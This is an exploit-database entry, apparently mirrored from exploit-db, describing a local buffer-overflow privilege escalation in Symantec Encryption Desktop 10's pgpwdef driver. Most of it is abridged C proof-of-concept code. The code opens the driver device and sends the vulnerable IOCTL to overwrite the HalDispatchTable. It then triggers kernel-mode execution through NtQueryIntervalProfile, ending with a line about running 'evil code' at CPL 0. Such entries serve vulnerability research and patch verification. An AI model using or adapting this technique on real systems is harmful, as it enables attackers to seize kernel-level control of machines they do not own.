Symantec Encryption Desktop 10 – Local Buffer Overflow / Local Privilege Escalation - 体验盒子

作者： Nikita Tarakanov

日期： 2012-02-25

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/38299/

source: https://www.securityfocus.com/bid/57835/info

Symantec Encryption Desktop is prone to a local buffer-overflow vulnerability. 

A local attacker may exploit this issue to execute arbitrary code with escalated privileges.

#define IO_CONTROL_VULN 0x80022058
 
#define TARGET_DEVICE L"\\Device\\pgpwdef"
 
[..]
 
usName.Buffer = TARGET_DEVICE;
usName.Length = usName.MaximumLength = 
(USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));
 
InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE , 
NULL, NULL);
 
 
// get handle of target devide
ns = f_NtOpenFile(
&hDev,
FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
&ObjAttr,
&StatusBlock,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_SYNCHRONOUS_IO_NONALERT
);
 
[..]
 
BOOL bStatus = DeviceIoControl(
hDev,
IO_CONTROL_VULN,
InBuff, 0x8,
OutBuff, 0x8,
&dwReturnLen, NULL
);
 
dwReturnLen = 0;
bStatus = DeviceIoControl(
hDev,
IO_CONTROL_VULN,
InBuff, sizeof(PVOID),
(PUCHAR)m_HalDispatchTable, 0,
&dwReturnLen, NULL
);
 
[..]
 
f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);
 
[..]
 
Your evil code processes with CPL==0